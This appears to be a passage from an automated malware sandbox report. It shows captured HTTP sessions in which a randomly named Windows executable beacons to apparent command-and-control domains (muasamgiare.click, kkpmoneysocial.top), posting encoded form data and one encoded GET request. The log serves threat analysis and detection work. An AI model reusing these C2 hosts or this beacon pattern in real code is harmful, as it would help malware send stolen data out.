                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                                                                                            Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            1192.168.2.64999218.139.62.226801436C:\Program Files (x86)\CVnNmScBntxJgmrozRwUnYXtrelnfCoqbaiMYsyBpiDGetFXKnFDSwJewNjWwcuK\ikSQhwOmrrnfH.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Jan 11, 2025 04:25:31.321279049 CET756OUTPOST /bsye/ HTTP/1.1
                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                            Host: www.muasamgiare.click
                                                                                                            Cache-Control: max-age=0
                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                            Content-Length: 209
                                                                                                            Connection: close
                                                                                                            Origin: http://www.muasamgiare.click
                                                                                                            Referer: http://www.muasamgiare.click/bsye/
                                                                                                            User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.20 (KHTML, like Gecko) Chrome/11.0.672.2 Safari/534.20
                                                                                                            Data Raw: 39 50 5a 74 3d 72 65 50 77 37 6d 4a 50 72 72 43 43 4b 57 55 2f 4e 7a 4e 49 41 6a 69 41 6f 6d 6a 5a 31 73 64 4b 41 45 79 49 51 58 79 35 4f 43 75 76 75 59 30 6f 62 46 46 45 61 46 6d 6e 69 7a 61 33 70 48 39 58 72 6f 4d 48 39 57 65 7a 59 73 58 48 74 5a 63 46 56 78 2b 38 63 7a 38 68 4f 31 71 46 6d 7a 41 58 6c 61 38 74 59 64 59 68 4e 73 66 6c 70 64 35 73 36 6b 42 56 71 35 68 4e 78 68 52 53 45 51 63 34 30 6c 4b 36 4a 6f 73 38 50 77 6a 65 66 50 42 6a 4e 46 78 4e 33 34 43 4d 37 48 32 78 71 6d 43 4b 34 56 44 76 4b 4d 57 62 46 45 41 2f 4b 50 6e 34 32 4b 2f 56 4a 5a 33 59 4b 62 56 53 42 45 72 4e 4f 54 4d 4b 6b 51 44 4f 42 4b 4e 31
                                                                                                            Data Ascii: 9PZt=rePw7mJPrrCCKWU/NzNIAjiAomjZ1sdKAEyIQXy5OCuvuY0obFFEaFmniza3pH9XroMH9WezYsXHtZcFVx+8cz8hO1qFmzAXla8tYdYhNsflpd5s6kBVq5hNxhRSEQc40lK6Jos8PwjefPBjNFxN34CM7H2xqmCK4VDvKMWbFEA/KPn42K/VJZ3YKbVSBErNOTMKkQDOBKN1
                                                                                                            Jan 11, 2025 04:25:32.258096933 CET368INHTTP/1.1 301 Moved Permanently
                                                                                                            Server: openresty
                                                                                                            Date: Sat, 11 Jan 2025 03:25:32 GMT
                                                                                                            Content-Type: text/html
                                                                                                            Content-Length: 166
                                                                                                            Connection: close
                                                                                                            Location: https://www.muasamgiare.click/bsye/
                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                            Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>openresty</center></body></html>


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            2192.168.2.64999318.139.62.226801436C:\Program Files (x86)\CVnNmScBntxJgmrozRwUnYXtrelnfCoqbaiMYsyBpiDGetFXKnFDSwJewNjWwcuK\ikSQhwOmrrnfH.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Jan 11, 2025 04:25:33.880604029 CET780OUTPOST /bsye/ HTTP/1.1
                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                            Host: www.muasamgiare.click
                                                                                                            Cache-Control: max-age=0
                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                            Content-Length: 233
                                                                                                            Connection: close
                                                                                                            Origin: http://www.muasamgiare.click
                                                                                                            Referer: http://www.muasamgiare.click/bsye/
                                                                                                            User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.20 (KHTML, like Gecko) Chrome/11.0.672.2 Safari/534.20
                                                                                                            Data Raw: 39 50 5a 74 3d 72 65 50 77 37 6d 4a 50 72 72 43 43 59 6d 45 2f 4c 53 4e 49 49 6a 69 50 6e 47 6a 5a 2f 4d 64 52 41 45 4f 49 51 57 32 70 4f 30 32 76 75 35 45 6f 61 45 46 45 5a 46 6d 6e 71 54 61 79 6e 6e 39 51 72 6f 52 34 39 58 79 7a 59 73 72 48 74 62 55 46 56 6d 71 37 4f 54 38 6a 48 56 72 6a 37 6a 41 58 6c 61 38 74 59 64 4d 48 4e 73 48 6c 70 74 4a 73 37 42 31 57 6d 5a 68 4f 6e 78 52 53 41 51 63 30 30 6c 4c 76 4a 70 67 43 50 79 72 65 66 4f 78 6a 4d 58 5a 4d 69 49 43 4b 6b 58 33 67 73 55 6a 37 69 33 65 35 41 73 6d 67 47 56 45 38 50 35 36 69 71 35 2f 32 62 4a 58 61 4b 5a 4e 67 42 6b 72 6e 4d 54 30 4b 32 48 50 70 4f 2b 6f 57 37 47 6f 42 77 68 43 4d 73 39 34 70 74 53 57 2f 6a 43 7a 76 6d 77 3d 3d
                                                                                                            Data Ascii: 9PZt=rePw7mJPrrCCYmE/LSNIIjiPnGjZ/MdRAEOIQW2pO02vu5EoaEFEZFmnqTaynn9QroR49XyzYsrHtbUFVmq7OT8jHVrj7jAXla8tYdMHNsHlptJs7B1WmZhOnxRSAQc00lLvJpgCPyrefOxjMXZMiICKkX3gsUj7i3e5AsmgGVE8P56iq5/2bJXaKZNgBkrnMT0K2HPpO+oW7GoBwhCMs94ptSW/jCzvmw==
                                                                                                            Jan 11, 2025 04:25:34.806237936 CET368INHTTP/1.1 301 Moved Permanently
                                                                                                            Server: openresty
                                                                                                            Date: Sat, 11 Jan 2025 03:25:34 GMT
                                                                                                            Content-Type: text/html
                                                                                                            Content-Length: 166
                                                                                                            Connection: close
                                                                                                            Location: https://www.muasamgiare.click/bsye/
                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                            Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>openresty</center></body></html>


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            3192.168.2.64999418.139.62.226801436C:\Program Files (x86)\CVnNmScBntxJgmrozRwUnYXtrelnfCoqbaiMYsyBpiDGetFXKnFDSwJewNjWwcuK\ikSQhwOmrrnfH.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Jan 11, 2025 04:25:36.424560070 CET1793OUTPOST /bsye/ HTTP/1.1
                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                            Host: www.muasamgiare.click
                                                                                                            Cache-Control: max-age=0
                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                            Content-Length: 1245
                                                                                                            Connection: close
                                                                                                            Origin: http://www.muasamgiare.click
                                                                                                            Referer: http://www.muasamgiare.click/bsye/
                                                                                                            User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.20 (KHTML, like Gecko) Chrome/11.0.672.2 Safari/534.20
                                                                                                            Data Raw: 39 50 5a 74 3d 72 65 50 77 37 6d 4a 50 72 72 43 43 59 6d 45 2f 4c 53 4e 49 49 6a 69 50 6e 47 6a 5a 2f 4d 64 52 41 45 4f 49 51 57 32 70 4f 30 4f 76 70 50 59 6f 63 6e 39 45 59 46 6d 6e 67 7a 61 7a 6e 6e 38 4d 72 6f 4a 30 39 58 75 4a 59 70 76 48 73 2b 41 46 41 6a 47 37 58 6a 38 6a 59 46 72 33 6d 7a 41 47 6c 61 74 46 59 64 63 48 4e 73 48 6c 70 72 46 73 38 55 42 57 67 5a 68 4e 78 68 52 65 45 51 64 72 30 68 65 59 4a 70 6b 53 50 47 66 65 66 75 68 6a 42 43 46 4d 2b 59 43 49 6e 58 33 34 73 55 76 67 69 33 43 39 41 75 47 47 47 58 59 38 4f 65 6e 43 35 49 66 63 49 5a 4c 37 57 71 4e 68 46 54 7a 49 4a 41 51 30 6d 33 2f 2b 45 74 59 36 32 43 30 70 6c 43 33 32 74 62 63 4c 6e 53 76 73 69 51 6d 48 2b 34 4a 4d 31 6b 55 6f 7a 6e 2f 75 75 6f 62 32 6d 71 51 5a 75 68 79 34 69 4b 78 41 52 75 4a 58 35 6e 64 45 57 63 62 46 31 4d 4e 76 76 71 48 38 30 46 31 63 2b 61 75 70 63 58 7a 50 76 6a 2f 79 49 69 74 44 65 4f 32 49 52 42 51 4e 62 77 59 67 65 36 58 77 67 50 74 68 45 56 36 4c 63 54 6d 36 77 77 4f 30 67 64 2b 42 4d 34 53 4c 4a [TRUNCATED]
                                                                                                            Data Ascii: 9PZt=rePw7mJPrrCCYmE/LSNIIjiPnGjZ/MdRAEOIQW2pO0OvpPYocn9EYFmngzaznn8MroJ09XuJYpvHs+AFAjG7Xj8jYFr3mzAGlatFYdcHNsHlprFs8UBWgZhNxhReEQdr0heYJpkSPGfefuhjBCFM+YCInX34sUvgi3C9AuGGGXY8OenC5IfcIZL7WqNhFTzIJAQ0m3/+EtY62C0plC32tbcLnSvsiQmH+4JM1kUozn/uuob2mqQZuhy4iKxARuJX5ndEWcbF1MNvvqH80F1c+aupcXzPvj/yIitDeO2IRBQNbwYge6XwgPthEV6LcTm6wwO0gd+BM4SLJKwEk6Jn4Evsz03zDQYSIdCAJVxnNyWjqqnu4GEfa5W5omOuelW+B5xGm+7oZpsb3ORI5M2VWnQ1uDAqh9MBu7gkBSHVGQv4ymdmw2ouPlRDY9IM3m78SYvoN3uvbmGoWiwtR4TdEatMWbJgkH/737gd3ogmCcGVCqmQHARqd+gLpCMdS07VifSdt9mJyjY4Ho1cIiCYkAo9XFl5u0l95sM8aExBPSXd/vOy4Ja6A8GJ1ikPehJsqYTCxPMl+35STU80E+qx1IwVZsrZlXJnQ59idPu94YPokNDRCOtcQubkBmiQylsTnHMaI+0OLAXdNOUczKIklPUR4E1voEv6Xfrve5SGbYgezU3RI79pzGllgaJcvZpBlDaiwis0MCyR2spmDdnBPvXmF/0BE+dfI+1gZufqxgmWKJPpOoDoP+/+6R5DSdNyXO5CaP1+MCzYhHVw1X33MZ4OmrUIrwSIA8V1m+/rQMUC7MW4gFBq/ay+unUrU8UVe9Xt33jQ25x97CCvGEDw3hbGzbfZ4lgYk9461VzoZvJ9TIVvrIdGHiv17nX2m6C4qolGwHZGKnjikSJCCyG9SeYk1ozKTeGKWLIl65GNw83S+G+dNvVVdKTp/d9/5ghiAPao8ScBwpKuEAjgDCbiaeWLpKtJklQYwxVBVKtPpdj7AoI [TRUNCATED]
                                                                                                            Jan 11, 2025 04:25:37.356348991 CET368INHTTP/1.1 301 Moved Permanently
                                                                                                            Server: openresty
                                                                                                            Date: Sat, 11 Jan 2025 03:25:37 GMT
                                                                                                            Content-Type: text/html
                                                                                                            Content-Length: 166
                                                                                                            Connection: close
                                                                                                            Location: https://www.muasamgiare.click/bsye/
                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                            Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>openresty</center></body></html>


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            4192.168.2.64999518.139.62.226801436C:\Program Files (x86)\CVnNmScBntxJgmrozRwUnYXtrelnfCoqbaiMYsyBpiDGetFXKnFDSwJewNjWwcuK\ikSQhwOmrrnfH.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Jan 11, 2025 04:25:39.121903896 CET489OUTGET /bsye/?9PZt=mcnQ4SBirrzxTltKHyxTOkuilQ7foOQlHEOXMV6ABku0gY5yW1xEZyvN1jK2v2RF378l0UeaVYff77sSRT2Ifk8NCmqj7EA+sq0ZeNMbUcOm/Pw4wT4fiopZxiw3DzN75FCJC90=&I8A=fF8h_X3X0TB HTTP/1.1
                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                            Host: www.muasamgiare.click
                                                                                                            Connection: close
                                                                                                            User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.20 (KHTML, like Gecko) Chrome/11.0.672.2 Safari/534.20
                                                                                                            Jan 11, 2025 04:25:40.057163954 CET526INHTTP/1.1 301 Moved Permanently
                                                                                                            Server: openresty
                                                                                                            Date: Sat, 11 Jan 2025 03:25:39 GMT
                                                                                                            Content-Type: text/html
                                                                                                            Content-Length: 166
                                                                                                            Connection: close
                                                                                                            Location: https://www.muasamgiare.click/bsye/?9PZt=mcnQ4SBirrzxTltKHyxTOkuilQ7foOQlHEOXMV6ABku0gY5yW1xEZyvN1jK2v2RF378l0UeaVYff77sSRT2Ifk8NCmqj7EA+sq0ZeNMbUcOm/Pw4wT4fiopZxiw3DzN75FCJC90=&I8A=fF8h_X3X0TB
                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                            Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>openresty</center></body></html>


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            5192.168.2.649996104.21.112.1801436C:\Program Files (x86)\CVnNmScBntxJgmrozRwUnYXtrelnfCoqbaiMYsyBpiDGetFXKnFDSwJewNjWwcuK\ikSQhwOmrrnfH.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Jan 11, 2025 04:25:45.245505095 CET759OUTPOST /86am/ HTTP/1.1
                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                            Host: www.kkpmoneysocial.top
                                                                                                            Cache-Control: max-age=0
                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                            Content-Length: 209
                                                                                                            Connection: close
                                                                                                            Origin: http://www.kkpmoneysocial.top
                                                                                                            Referer: http://www.kkpmoneysocial.top/86am/
                                                                                                            User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.20 (KHTML, like Gecko) Chrome/11.0.672.2 Safari/534.20
                                                                                                            Data Raw: 39 50 5a 74 3d 36 71 36 6e 36 56 4c 7a 55 38 65 73 4a 42 5a 6d 6a 30 2f 45 58 67 7a 73 4d 4b 49 46 41 50 5a 4e 4f 61 31 79 76 59 63 4f 57 42 43 50 53 45 31 48 66 39 54 56 32 68 4f 76 54 42 30 69 77 6c 34 2f 68 51 49 38 62 69 4c 4e 67 2b 55 56 6e 55 4d 30 46 62 6a 71 2f 76 61 4c 72 77 55 76 53 61 6d 73 79 2b 79 48 46 79 30 65 35 6f 4d 55 7a 59 33 66 2b 4f 73 5a 31 37 2b 4c 47 58 64 48 79 57 4e 38 45 6d 4e 62 48 51 69 46 41 47 78 34 31 59 59 50 54 56 6b 6e 46 38 46 7a 75 52 4e 64 33 39 6e 73 4b 56 65 66 41 52 45 6b 4b 77 56 71 5a 34 64 45 30 2f 2b 45 45 43 43 4e 59 46 71 5a 31 47 49 56 4b 49 79 66 43 4a 64 41 58 6c 5a 6a
                                                                                                            Data Ascii: 9PZt=6q6n6VLzU8esJBZmj0/EXgzsMKIFAPZNOa1yvYcOWBCPSE1Hf9TV2hOvTB0iwl4/hQI8biLNg+UVnUM0Fbjq/vaLrwUvSamsy+yHFy0e5oMUzY3f+OsZ17+LGXdHyWN8EmNbHQiFAGx41YYPTVknF8FzuRNd39nsKVefAREkKwVqZ4dE0/+EECCNYFqZ1GIVKIyfCJdAXlZj
                                                                                                            Jan 11, 2025 04:25:45.859392881 CET1236INHTTP/1.1 200 OK
                                                                                                            Date: Sat, 11 Jan 2025 03:25:45 GMT
                                                                                                            Content-Type: text/html;charset=utf-8
                                                                                                            Transfer-Encoding: chunked
                                                                                                            Connection: close
                                                                                                            Vary: Accept-Encoding
                                                                                                            Set-Cookie: loclang=en; expires=Tue, 14-Jan-2025 03:25:45 GMT; Max-Age=259200; path=/
                                                                                                            cf-cache-status: DYNAMIC
                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=TuuziQIfBTG7rWC6sp5Ne0PHoCzhZJBlMLiEsbvdrcj%2Bqac3OCOlYog76itk1m3YBV0hVnuY%2FF3aAfkrz4xxFpwI7mzipwgwoQlm%2BfZCPsPqBlyjLv9CDXC%2BL8eayISk0cX%2Fv4BbLQ5l"}],"group":"cf-nel","max_age":604800}
                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                            Server: cloudflare
                                                                                                            CF-RAY: 9001cd282ad80f5b-EWR
                                                                                                            Content-Encoding: gzip
                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1621&min_rtt=1621&rtt_var=810&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=759&delivery_rate=0&cwnd=219&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                            Data Raw: 34 34 38 0d 0a 1f 8b 08 00 00 00 00 00 00 03 c4 97 ff 6e db 36 10 c7 ff 0e 81 bd c3 55 28 20 a9 76 24 39 ae b3 34 b2 5c 0c 6d d7 fe 91 60 43 1b ac 18 8a d6 a0 a5 b3 c4 58 22 35 92 f2 0f a4 79 83 bd c3 9e 63 6f b5 47 18 24 4b b1 bc da 4d b7 20 99 61 40 22 cd fb f2 ee c3 e3 91 26 64 f8 e8 e5 4f 2f 2e 7e fd f9 15 24 3a 4b 47 64 d8 3c 90 46 23 32 54 a1 64 b9 1e 11 00 85 fa 82 65 28 0a 6d 4d 0b 1e 6a 26 b8 65 5f 11 00 80 54 84 b4 6c 3b 89 c4 69 60 b8 8c 47 b8 74 f2 24 37 7c 02 70 dd 1d 78 9e 67 fb 64 e8 36 6a c3 0c 35 85 30 a1 52 a1 0e 8c 42 4f 0f 4f 8c a6 9b d3 0c 03 63 ce 70 91 0b a9 0d 08 05 d7 c8 75 60 2c 58 a4 93 20 c2 39 0b f1 b0 6a 74 81 71 a6 19 4d 0f 55 48 53 0c 7a 5d 50 89 64 7c 76 a8 c5 e1 94 e9 80 0b 63 44 6a dd 5c 8a 1c a5 5e 05 86 88 4f 59 46 63 6c 69 bb 54 29 d4 ca 55 22 64 34 1d b3 2c 3e 72 2e f3 f8 c6 a9 2d 63 cd 74 da 36 fe eb 8f df ff 3c 43 6d 2a c8 e8 0c 21 13 1c 57 80 54 b1 74 05 0b a6 13 c8 c4 84 a5 08 79 22 38 42 39 da
                                                                                                            Data Ascii: 448n6U( v$94\m`CX"5ycoG$KM a@"&dO/.~$:KGd<F#2Tde(mMj&e_Tl;i`Gt$7|pxgd6j50RBOOcpu`,X 9jtqMUHSz]Pd|vcDj\^OYFcliT)U"d4,>r.-ct6<Cm*!WTty"8B9
                                                                                                            Jan 11, 2025 04:25:45.859411001 CET791INData Raw: 28 89 ee 50 8e 70 8d 88 09 de d2 7f 8f 40 25 82 4e 10 26 a8 34 20 95 9c f1 18 14 d3 08 82 a7 8c 23 e4 74 55 76 89 39 4a 78 dc 1f 40 c6 d2 94 09 0e 39 ca d2 21 9d 80 16 d0 f7 bc ae e7 79 90 61 36 41 a9 76 47 57 a1 39 ad f8 b6 7c 38 f6 bc 7c f9 35
                                                                                                            Data Ascii: (Pp@%N&4 #tUv9Jx@9!ya6AvGW9|8|5YtE!D\bpf^G|BQXc;n/pRB3i\;K1`Z<Zb2*W5#FSqnub"jqQ.LEE*aEq


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            6192.168.2.649997104.21.112.1801436C:\Program Files (x86)\CVnNmScBntxJgmrozRwUnYXtrelnfCoqbaiMYsyBpiDGetFXKnFDSwJewNjWwcuK\ikSQhwOmrrnfH.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Jan 11, 2025 04:25:47.805329084 CET783OUTPOST /86am/ HTTP/1.1
                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                            Host: www.kkpmoneysocial.top
                                                                                                            Cache-Control: max-age=0
                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                            Content-Length: 233
                                                                                                            Connection: close
                                                                                                            Origin: http://www.kkpmoneysocial.top
                                                                                                            Referer: http://www.kkpmoneysocial.top/86am/
                                                                                                            User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.20 (KHTML, like Gecko) Chrome/11.0.672.2 Safari/534.20
                                                                                                            Data Raw: 39 50 5a 74 3d 36 71 36 6e 36 56 4c 7a 55 38 65 73 4c 69 78 6d 67 54 44 45 47 51 7a 76 47 71 49 46 4a 76 5a 4a 4f 61 35 79 76 5a 4a 44 57 7a 6d 50 53 6c 46 48 65 34 7a 56 33 68 4f 76 4c 78 30 64 74 31 35 78 68 51 45 43 62 6a 33 4e 67 2b 41 56 6e 57 45 30 46 6f 4c 74 74 50 61 4a 67 51 55 78 63 36 6d 73 79 2b 79 48 46 79 51 34 35 70 6b 55 7a 6f 48 66 34 73 55 57 75 62 2b 4d 46 58 64 48 32 57 4e 34 45 6d 4e 6c 48 53 61 37 41 46 46 34 31 64 63 50 55 42 51 6b 4d 38 46 39 7a 42 4d 4d 38 39 43 6f 56 6e 44 63 66 53 41 6b 57 33 70 57 63 4f 41 65 6f 4d 2b 6e 57 53 69 50 59 48 79 72 31 6d 49 2f 49 49 4b 66 51 65 52 6e 59 52 38 41 48 36 66 6b 31 37 77 52 58 32 51 74 43 48 52 62 44 68 66 51 45 41 3d 3d
                                                                                                            Data Ascii: 9PZt=6q6n6VLzU8esLixmgTDEGQzvGqIFJvZJOa5yvZJDWzmPSlFHe4zV3hOvLx0dt15xhQECbj3Ng+AVnWE0FoLttPaJgQUxc6msy+yHFyQ45pkUzoHf4sUWub+MFXdH2WN4EmNlHSa7AFF41dcPUBQkM8F9zBMM89CoVnDcfSAkW3pWcOAeoM+nWSiPYHyr1mI/IIKfQeRnYR8AH6fk17wRX2QtCHRbDhfQEA==
                                                                                                            Jan 11, 2025 04:25:48.426722050 CET1236INHTTP/1.1 200 OK
                                                                                                            Date: Sat, 11 Jan 2025 03:25:48 GMT
                                                                                                            Content-Type: text/html;charset=utf-8
                                                                                                            Transfer-Encoding: chunked
                                                                                                            Connection: close
                                                                                                            Vary: Accept-Encoding
                                                                                                            Set-Cookie: loclang=en; expires=Tue, 14-Jan-2025 03:25:48 GMT; Max-Age=259200; path=/
                                                                                                            cf-cache-status: DYNAMIC
                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2c9MC7y0rUxuFXU9zg%2BLo9C0A4C1Q%2FA7O6iIdB0tudLHx7nVzxixLj462ALkYSTNdBWp310U5k6ZJAnL8RKnh9lGhf6QcDABfxfLq6aWlR%2Fa%2BejA69CWJ5CtQxB%2B%2FI1tRxUOvrNozp%2BE"}],"group":"cf-nel","max_age":604800}
                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                            Server: cloudflare
                                                                                                            CF-RAY: 9001cd383d600f5b-EWR
                                                                                                            Content-Encoding: gzip
                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1588&min_rtt=1588&rtt_var=794&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=783&delivery_rate=0&cwnd=219&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
